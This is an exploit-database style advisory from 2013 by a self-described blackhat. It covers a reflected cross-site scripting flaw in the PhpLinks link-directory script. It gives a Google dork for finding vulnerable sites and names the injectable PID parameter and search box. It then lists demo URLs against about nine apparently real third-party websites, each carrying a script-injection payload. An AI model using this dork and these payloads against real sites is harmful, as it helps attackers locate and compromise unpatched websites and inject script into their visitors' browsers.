#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: PhpLinks Cross Site Scripting Vulnerability # Date: 2013 15 September # Author: Arsan # Vendor Homepage: www.newphplinks.com # Version : All Version # Tested on: Linux & Windows # Category: webapps # Google Keywords: inurl:"/index.php?PID=" intext:"Powered By phpLinks" # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # http://<server>/index.php?PID=[XSS] # http://<server>/[XSS In SearchBox] # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Demo : # # www.nXuth.com/index.php?PID=5"><script>alert(/Arsan/)</script> # www.eXeli.at/phplinks/index.php?PID=5"><script>alert(/Arsan/)</script> # www.ingegnXambientali.it/cercambiente/index.php?PID=5"><script>alert(/Arsan/)</script> # www.tourisXfo.it/index.php?PID=205"><script>alert(/Arsan/)</script> # www.lupuXnce-timbres.net/index.php?PID=10"><script>alert(/Arsan/)</script> # www.links.sXlbard.com/index.php?PID=3"><script>alert(/Arsan/)</script> # www.X.com/links/index.php?PID=6"><script>alert(/Arsan/)</script> # www.dietrX.kracht.free.fr/phplinks/index.php?PID=4"><script>alert(/Arsan/)</script> # www.myXcom.tw/avlinks/index.php?PID=5"><script>alert(/Arsan/)</script> # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#